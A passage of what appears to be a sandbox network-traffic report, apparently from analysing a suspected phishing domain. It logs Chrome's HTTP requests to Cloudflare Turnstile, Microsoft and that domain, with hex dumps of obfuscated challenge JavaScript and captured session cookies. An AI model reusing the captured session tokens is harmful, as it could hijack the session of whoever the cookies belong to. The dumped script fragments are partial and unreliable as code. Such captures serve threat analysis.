                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:08 UTC1369INData Raw: 5b 31 36 38 2e 33 37 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 68 67 28 31 36 37 34 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 36 38 2e 30 34 5d 5b 30 5d 2b 2b 29 2d 33 38 2c 32 35 36 29 2c 32 35 35 29 5e 31 35 32 5e 74 68 69 73 2e 67 5d 2c 74 68 69 73 2e 68 5b 6e 5b 68 67 28 31 37 37 32 29 5d 28 73 2c 74 68 69 73 2e 67 29 5d 3d 76 29 7d 2c 31 30 29 2c 65 4d 5b 68 64 28 31 30 39 38 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 68 29 7b 68 68 3d 68 64 2c 65 4d 5b 68 68 28 31 35 34 33 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 68 64 28 38 32 31 29 5d 5b 68 64 28 31 30 31 31 29 5d 28 6a 5b 68 64 28 31 35 33 35 29 5d 2c 6d 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 65 57 3d 7b 7d 2c 65 57 5b 67 49 28 31 36 36 37 29 5d 3d 65 56 2c 65 4d 5b 67 49 28 31 36 38 31 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: [168.37^this.g][1][hg(1674)](this.h[this.g^168.04][0]++)-38,256),255)^152^this.g],this.h[n[hg(1772)](s,this.g)]=v)},10),eM[hd(1098)](function(hh){hh=hd,eM[hh(1543)]()},1e3),eM[hd(821)][hd(1011)](j[hd(1535)],m));return![]},eW={},eW[gI(1667)]=eV,eM[gI(1681)


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              15192.168.2.449762104.18.95.414431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:07 UTC795OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iyj2o/0x4AAAAAAAkfyuN_fqTRgfZH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:08 UTC210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf8724af9d90f37-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:08 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              16192.168.2.449760184.28.90.27443
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:07 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:08 UTC514INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-CID: 11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=77490
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-CID: 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:08 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              17192.168.2.449748172.67.220.614431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:08 UTC1327OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ortkn.lovationyme.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://ortkn.lovationyme.com/5wLmN/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6ImpwMWRud2dJVENxNDdSdGpZbnJlekE9PSIsInZhbHVlIjoiU0U5SlBEd1N3TzRvU3d2eWF3K2k4Z0VCWFBJakZDdTlSTUFxS0VkMGIybWEyTjJpRVM5cDV0SFBMdDhNT0FXV1lkcGM4V1JDajNiZ3orWlJ5U09wNFVkMWVhSFhlc1BvekpZdEFWa0VNS1dRZ0x2UnhObDZVbThqSm0vZkwxZ20iLCJtYWMiOiIwY2VlMWIzYzY3NWNlYTU0Nzc2NjdmODhmMzFhNjc0OTUzMGNhYjgwM2NkYWFlYTM4OWVmNTNmMjBiZTU0NzEzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjB6MWxmbWM2amhmOWYrT3lCU3ZacFE9PSIsInZhbHVlIjoibyt1Q1lQVm1pYzE3UXEzdHFDUjRnYVlJUnhPUE56bVhsUHZGV3UzazU2ZGtSbWNLRHJIb0JEdjRncmVEUUFYRVN1aGdOWnpwckc0eVp0dHIvQkVaMjFRV3piT2s0dEdFUlNnODN6bGZuNSt5M0MyWkhFUjFGWUM3d25ib2FqWE0iLCJtYWMiOiI2ZmIyOTRmYjY1YjIwZjc1ZDRjYmUzYzczYjc3NDFjMmQ3OWMxZTAzZjA0MWVkMTk2MzZhZDQwMGJjNjU1YjExIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:08 UTC647INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6KdRWvwSuOU39JixHn381rvLwHcjJW8mEQ9TwJjsoSI6IJgWT73h9kzOQKl3kgL4P4VYpzxW9gQ7GhH2Rri36Jw96qZBgwLE3mrmmSDVpqWRw7pNOlLcpoOGZ7XaWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 12145
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf8724e3b284269-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              18192.168.2.449763104.18.94.414431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:08 UTC438OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf8724f0a275e5f-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              19192.168.2.449764104.18.94.414431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8cf87240ceda19cb&lang=auto HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 119075
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf8724fc84e41e6-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 54 74 59 6a 30 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.TtYj0={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"http
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1369INData Raw: 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 69 6e 76 61 6c 69 64 5f 64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 2%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_feedback_report":"Having%20trouble%3F","invalid_d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1369INData Raw: 74 28 67 48 28 37 39 39 29 29 2f 38 2b 70 61 72 73 65 49 6e 74 28 67 48 28 31 33 36 37 29 29 2f 39 2b 2d 70 61 72 73 65 49 6e 74 28 67 48 28 34 33 38 29 29 2f 31 30 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 32 38 39 33 35 38 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 35 35 32 29 5d 2c 65 4d 5b 67 49 28 31 36 32 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 67 54 2c 65 29 7b 65 3d 28 67 54 3d 67 49 2c 7b 27 5a 76 77 44 69 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 67 7d 2c 27 52 5a 54 4a 58 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t(gH(799))/8+parseInt(gH(1367))/9+-parseInt(gH(438))/10,d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,289358),eM=this||self,eN=eM[gI(552)],eM[gI(1627)]=function(c,gT,e){e=(gT=gI,{'ZvwDi':function(g,h){return h===g},'RZTJX':function(g,h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1369INData Raw: 26 68 7d 2c 27 72 42 6a 67 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 45 61 76 55 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 76 7a 62 55 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 52 55 74 52 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 67 4a 45 78 52 27 3a 68 6f 28 31 35 34 37 29 2c 27 51 49 45 4c 44 27 3a 68 6f 28 31 35 33 34 29 2c 27 6f 74 50 6a 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 66 53 4e 52 41 27 3a 68 6f 28 37 36 32 29 2c 27 4e 56 49 51 47 27 3a 68 6f 28 31 34 31 30 29 2c 27 4a 56 78 59 66 27 3a 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &h},'rBjgy':function(h,i){return h<i},'EavUu':function(h,i){return h==i},'vzbUM':function(h,i){return i&h},'RUtRB':function(h,i){return h-i},'gJExR':ho(1547),'QIELD':ho(1534),'otPjl':function(h,i){return h(i)},'fSNRA':ho(762),'NVIQG':ho(1410),'JVxYf':func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1369INData Raw: 36 33 2e 38 32 2c 31 32 38 29 29 29 2c 48 2b 3d 49 5b 68 71 28 31 32 38 29 5d 28 64 5b 68 71 28 31 31 39 33 29 5d 28 36 33 2e 39 35 26 4f 2c 31 32 38 29 29 29 3b 65 6c 73 65 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 68 71 28 35 39 37 29 5d 28 64 5b 68 71 28 31 31 31 38 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 71 28 31 35 31 35 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 48 3c 3c 31 7c 64 5b 68 71 28 31 35 35 30 29 5d 28 4d 2c 31 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 68 71 28 35 39 37 29 5d 28 64 5b 68 71 28 35 36 31 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 7d 65 6c 73 65 7b 66 6f 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 63.82,128))),H+=I[hq(128)](d[hq(1193)](63.95&O,128)));else{for(s=0;s<F;H<<=1,j-1==I?(I=0,G[hq(597)](d[hq(1118)](o,H)),H=0):I++,s++);for(M=C[hq(1515)](0),s=0;8>s;H=H<<1|d[hq(1550)](M,1),j-1==I?(I=0,G[hq(597)](d[hq(561)](o,H)),H=0):I++,M>>=1,s++);}}else{for
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1369INData Raw: 3d 4d 61 74 68 5b 68 71 28 31 36 30 37 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 72 65 74 75 72 6e 27 27 7d 65 6c 73 65 20 66 6f 72 28 4d 3d 78 5b 43 5d 2c 73 3d 30 3b 64 5b 68 71 28 32 30 35 29 5d 28 73 2c 46 29 3b 48 3d 64 5b 68 71 28 31 37 35 29 5d 28 48 3c 3c 31 2c 4d 26 31 2e 34 37 29 2c 64 5b 68 71 28 31 35 33 30 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 68 71 28 35 39 37 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 44 2d 2d 2c 30 3d 3d 44 26 26 46 2b 2b 7d 66 6f 72 28 4d 3d 32 2c 73 3d 30 3b 64 5b 68 71 28 32 30 35 29 5d 28 73 2c 46 29 3b 48 3d 48 3c 3c 31 7c 64 5b 68 71 28 33 34 30 29 5d 28 4d 2c 31 29 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: =Math[hq(1607)](2,F),F++),delete B[C]}else return''}else for(M=x[C],s=0;d[hq(205)](s,F);H=d[hq(175)](H<<1,M&1.47),d[hq(1530)](I,j-1)?(I=0,G[hq(597)](o(H)),H=0):I++,M>>=1,s++);D--,0==D&&F++}for(M=2,s=0;d[hq(205)](s,F);H=H<<1|d[hq(340)](M,1),I==j-1?(I=0,G[h
